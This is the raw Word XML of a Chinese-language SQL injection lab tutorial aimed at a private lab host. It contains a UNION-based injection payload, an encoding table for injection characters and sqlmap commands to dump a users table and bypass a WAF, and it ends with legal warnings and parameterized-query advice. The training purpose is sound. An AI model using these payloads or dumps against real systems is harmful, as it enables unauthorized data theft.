          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>7.1 设置代理并拦截请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. 确保 Burp Suite 已打开，Proxy → Intercept 设为 Intercept is on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. 浏览器代理设置指向 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. 访问 http://192.168.126.129:5000/search?keyword=admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. 在 Burp 中看到拦截到的请求，右键 → Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>7.2 在 Repeater 中测试注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. 在 Repeater 中修改 keyword 参数的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. 点击 Send，观察响应变化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. 例如将 keyword=admin 改为 keyword=admin' UNION SELECT sqlite_version(),2,3,4--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. 如果页面显示了版本号，说明注入成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>7.3 URL 编码注意事项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字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>URL 编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>' （单引号）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>%27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>空格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>%20 或 +</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>| (管道符)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>%7C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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%23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--（无需编码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="667EEA"/>
        </w:rPr>
        <w:t>💡 在 Burp Repeater 中，直接粘贴原始 payload 即可，Burp 会自动处理大部分编码。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第八章：使用 SQLMap 自动化注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQLMap 是自动化 SQL 注入检测和利用的工具，可以替代手工测试：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基础扫描</w:t>
        <w:br/>
        <w:t>sqlmap -u "http://192.168.126.129:5000/search?keyword=admin" --dbms=sqlite</w:t>
        <w:br/>
        <w:br/>
        <w:t># 获取数据库列表</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite --dbs</w:t>
        <w:br/>
        <w:br/>
        <w:t># 获取表名</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite -D main --tables</w:t>
        <w:br/>
        <w:br/>
        <w:t># 获取列名</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite -T users --columns</w:t>
        <w:br/>
        <w:br/>
        <w:t># 导出数据</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite -T users --dump</w:t>
        <w:br/>
        <w:br/>
        <w:t># 指定注入技术（U = Union Based）</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite --technique=U --dump</w:t>
        <w:br/>
        <w:br/>
        <w:t># WAF 绕过 tamper 脚本</w:t>
        <w:br/>
        <w:t>sqlmap -u "..." --dbms=sqlite --tamper=space2comment --technique=U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>⚠ SQLMap 只能用于你拥有授权的测试环境。对未授权系统使用属违法行为。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第九章：安全与法律声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>⚠ 本报告仅供安全学习和授权测试使用！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>未经授权对他人系统进行 SQL 注入测试属于违法行为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>在中华人民共和国，根据《刑法》第285条、第286条，非法侵入计算机信息系统、非法获取数据最高可处七年有期徒刑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>本报告中的技术内容仅适用于你拥有完全所有权的测试环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>测试完成后，必须使用参数化查询修复所有 SQL 注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>输入过滤不可靠，参数化查询是唯一可靠的防御方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>推荐使用 SQLMap 等自动化工具替代手工拼接，提高效率、降低风险</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="999999"/>
        </w:rP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